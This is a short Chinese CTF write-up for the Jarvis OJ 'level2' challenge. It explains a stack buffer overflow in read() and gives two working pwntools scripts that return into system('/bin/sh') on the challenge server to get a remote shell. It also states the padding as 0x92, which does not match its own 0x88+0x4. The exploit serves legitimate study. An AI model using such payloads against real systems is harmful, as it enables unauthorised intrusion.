题目地址
开启了NX 那么就不能shellcode
read存在栈溢出
IDA按Shift+F12查看字符串,发现有shell
buf需要填充0x92个字符(0x88+0x4)
现在可以构造一个system("/bin/sh")的栈帧,通过控制vulnerable_function函数返回到该栈帧的地址,执行system("/bin/sh")来获取shell
system的地址为08048320
/bin/sh的地址为0804A024
利用代码如下
from pwn import *
r=remote('pwn2.jarvisoj.com',9878)
payload='a'*(0x88+0x4)+p32(0x08048320)+'aaaa'+p32(0x804a024) //跳到system地址,返回地址为0xaaaa,参数为/bin/sh
r.sendline(payload)
r.interactive()
或者
from pwn import *
p = remote('pwn2.jarvisoj.com','9878') elf = ELF('./level2') sh_addr = elf.search('/bin/sh').next() print p32(sh_addr) system_addr = elf.symbols['system'] print p32(system_addr) payload = 'a' * (0x88 + 0x4) + p32(system_addr) +'aaaa' + p32(sh_addr) p.send(payload) p.interactive()
执行